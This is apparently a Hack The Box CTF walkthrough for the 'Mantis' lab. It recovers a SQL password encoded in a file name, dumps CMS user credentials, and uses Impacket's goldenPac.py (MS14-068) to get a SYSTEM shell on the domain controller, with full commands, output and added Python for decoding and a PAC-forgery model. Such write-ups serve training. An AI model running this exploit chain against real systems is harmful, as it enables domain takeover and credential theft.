htb-mantis-nl

Today we are going to solve another CTF challenge, "Mantis", a retired lab from Hack The Box for online penetration-testing practice. The challenges in this lab are not easy without some penetration-testing knowledge. Let's start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are accessible online, they have a static IP. Mantis is 10.10.10.52, so let's start with nmap port enumeration.

root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after: 2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info: 
| 10.10.10.52:1433: 
| Version: 
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-05-07T13:10:15-04:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2019-05-07 13:10:12
|_ start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds

The scan output above shows a Windows Server 2008 R2 domain controller for htb.local (DNS, Kerberos, LDAP and SMB are all open) that also runs SQL Server 2014 Express on 1433 and an IIS site on 8080 titled "Tossed Salad - Blog". Note that SMB signing is required, so SMB relay is off the table.

Port 1337 is not among nmap's default top-1000 ports, so it does not appear in the scan above; a full-range scan (nmap -p-) shows it. Browsing to http://10.10.10.52:1337 returns the default IIS 7 welcome page, which gives no clue for the next step, so the next move is directory brute forcing.

I ran gobuster with the dirbuster directory-list-2.3-medium.txt wordlist against http://10.10.10.52:1337:

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.52:1337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)

As a result, I found the directory /secure_notes.

Directory listing is enabled there and shows two files, a dev_notes text file and web.config. The dev_notes file is the interesting one, so let's open it.

The dev_notes text file (contents below) describes how the box was built: SQL Server 2014 Express with a user "admin" and a database "orcharddb" behind an Orchard CMS blog. The username and database name are known; what is missing is the password.

The file name itself is suspicious: the part "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" in "/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt" looks like base64, so decoding it is the obvious next step towards the password.

root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

The note says the SQL Server credentials are in the file name, and the name dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt carries a base64-encoded token. Decoding it:

root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This looks like a hex string. Let’s convert it to ASCII:

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

Decoding the hex gives m$$ql_S@_P@ssW0rd!. Given the note's "create user "admin"" step, this is the SQL Server password for the admin login. (The "OrchardCMS admin creadentials" line in the same note is a third encoding, plain 8-bit binary, and decodes the same way.)
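The two decoding steps above were done by hand with base64 and xxd. The following Python is an added example (not part of the original write-up) that does the same chain, base64 to hex text to ASCII, for the file-name token, and also decodes the 8-bit binary line from the note. The token strings are copied from the page; the decode_note_token helper that picks the encoding by inspecting the characters is my own convenience, and its binary/hex guess can misfire on a hex string made only of 0 and 1 digits.

```python
import base64
import binascii
import string

# Strings copied from the dev_notes file name and contents shown above.
FILENAME_TOKEN = "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"
ORCHARD_BINARY = ("01000000011001000110110100100001011011100101111101010000"
                  "0100000001110011011100110101011100110000011100100110010000100001")

HEX_DIGITS = set(string.hexdigits)


def decode_filename_token(token: str) -> str:
    """base64 -> hex text -> ASCII, the same chain as `base64 -d | xxd -r -p`."""
    hex_text = base64.b64decode(token).decode("ascii")
    if not (set(hex_text) <= HEX_DIGITS and len(hex_text) % 2 == 0):
        # Wrong guess: the base64 payload is not a hex string at all.
        raise ValueError(f"base64 payload is not hex: {hex_text!r}")
    return binascii.unhexlify(hex_text).decode("ascii")


def decode_binary(bits: str) -> str:
    """ASCII written out as 8-bit binary groups (whitespace between groups is ignored)."""
    bits = "".join(bits.split())
    if len(bits) % 8:
        raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def decode_note_token(text: str) -> str:
    """Pick the encoding by its alphabet: binary, then plain hex, then base64-wrapped hex.
    Hex is tested before base64 because every hex string is also valid base64."""
    s = "".join(text.split())
    if set(s) <= {"0", "1"} and len(s) % 8 == 0:
        return decode_binary(s)
    if set(s) <= HEX_DIGITS and len(s) % 2 == 0:
        return binascii.unhexlify(s).decode("ascii")
    return decode_filename_token(s)


if __name__ == "__main__":
    print("SQL Server password  :", decode_filename_token(FILENAME_TOKEN))
    print("Orchard admin password:", decode_binary(ORCHARD_BINARY))
```

The base64 layer is what makes the file name look like a random token in a directory listing; once it is decoded the payload is ordinary hex, so the check that the intermediate is really hex is the useful guard when the same trick is applied to other names.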

Impacket's mssqlclient.py connects to the SQL Server on port 1433. Log in with the admin user and the recovered password; this is a SQL login rather than Windows authentication, so the htb.local/ prefix plays no part in the logon. Once in, list the databases, switch to orcharddb and look at the Orchard users table.

root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64) 
Feb 20 2014 20:04:26 
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master 
tempdb 
model 
msdb 
orcharddb 
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id 
UserName 
Email 
NormalizedUserName 
Password 
PasswordFormat 
HashAlgorithm 
PasswordSalt 
RegistrationStatus 
EmailStatus 
EmailChallengeToken 
CreatedUtc 
LastLoginUtc 
LastLogoutUtc 
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin 
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== 
James 
J@m3s_P@ssW0rd! 
SQL>

The users table stores the admin password as a hash but James's password, J@m3s_P@ssW0rd!, in clear text. James is a domain user, so the next step moves from SQL Server to Kerberos.

Before that, add the names found by nmap to the local hosts file, mapping 10.10.10.52 to htb.local and mantis.htb.local. Kerberos needs to reach the KDC by its real name, and goldenPac.py is given the DC's FQDN as the target.

Impacket was installed from GitHub:

git clone https://github.com/CoreSecurity/impacket.git

Impacket's goldenPac.py exploits MS14-068 (CVE-2014-6324). A domain controller missing that patch accepts a Kerberos ticket whose PAC is signed with a checksum type that needs no key, so any authenticated domain user can forge a PAC that lists them as a member of Domain Admins. The script requests such a ticket with James's credentials, then uses it PsExec-style: it uploads a service binary to the ADMIN$ share on the DC, creates and starts a service, and hands back a SYSTEM shell. Because the target is the DC itself, that single step yields both user.txt and root.txt. The "found vulnerable!" line in the output below is the script confirming the DC is unpatched. Kerberos is sensitive to clock skew (nmap reported about one second here) and to name resolution, hence the hosts entries.

root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567
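To make the MS14-068 mechanism behind goldenPac.py concrete, here is an added toy model in Python; it is not Impacket's code and does not talk to a KDC. The real PAC is an NDR-encoded binary structure carrying two checksums (a server checksum and a KDC checksum); this model collapses that to one blob and one signature so the point stands out: a checksum type that needs no key gives the KDC no way to tell a forged group list from a genuine one. The SIDs are the ones printed by goldenPac.py above; the KDC key is a constructed placeholder, since the real krbtgt key is exactly what an attacker does not have.

```python
import hashlib
import hmac
import json

# SIDs taken from the goldenPac.py output on this page.
FOREST_SID = "S-1-5-21-4220043660-4019079961-2895681657"
JAMES_RID = 1103
DOMAIN_USERS_RID = 513    # well-known RID
DOMAIN_ADMINS_RID = 512   # well-known RID

# Constructed stand-in for the krbtgt long-term key; never available to the attacker.
KDC_KEY = b"example-krbtgt-key-not-the-real-one"


def encode_pac(user_rid, group_rids):
    """Toy stand-in for the PAC logon-info buffer (the real one is NDR-encoded binary)."""
    return json.dumps({"user": f"{FOREST_SID}-{user_rid}",
                       "groups": [f"{FOREST_SID}-{r}" for r in group_rids]},
                      sort_keys=True).encode()


def unkeyed_checksum(blob):
    # Checksum types such as rsa-md5 or crc32 take no key, so anyone can compute them.
    return hashlib.md5(blob).digest()


def keyed_checksum(blob, key):
    return hmac.new(key, blob, hashlib.md5).digest()


def kdc_accepts(blob, sig, allow_unkeyed):
    """Model of the KDC's PAC signature check.
    allow_unkeyed=True is the pre-MS14-068 behaviour: a keyless checksum type is
    accepted as a valid signature. False accepts only the HMAC under the KDC key."""
    if allow_unkeyed and hmac.compare_digest(sig, unkeyed_checksum(blob)):
        return True
    return hmac.compare_digest(sig, keyed_checksum(blob, KDC_KEY))


def forge_pac_as_low_priv_user(user_rid):
    """What a plain domain user can do with no key at all: write any group list
    and attach an unkeyed checksum."""
    blob = encode_pac(user_rid, [DOMAIN_USERS_RID, DOMAIN_ADMINS_RID])
    return blob, unkeyed_checksum(blob)


def groups_in(blob):
    return json.loads(blob)["groups"]


def demo():
    """Run the forged PAC past an unpatched and a patched KDC model."""
    blob, sig = forge_pac_as_low_priv_user(JAMES_RID)
    return {
        "claims_domain_admins": f"{FOREST_SID}-{DOMAIN_ADMINS_RID}" in groups_in(blob),
        "accepted_by_unpatched_kdc": kdc_accepts(blob, sig, allow_unkeyed=True),
        "accepted_by_patched_kdc": kdc_accepts(blob, sig, allow_unkeyed=False),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The patched path is what MS14-068 introduced: the KDC rejects PAC signatures whose checksum type is not keyed, so a forged group list fails verification even though every byte of it is under the attacker's control. Once the DC trusts the forged PAC, the rest of goldenPac.py is ordinary PsExec over SMB with a ticket that says "Domain Admins".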

Author:  Puckiestyle
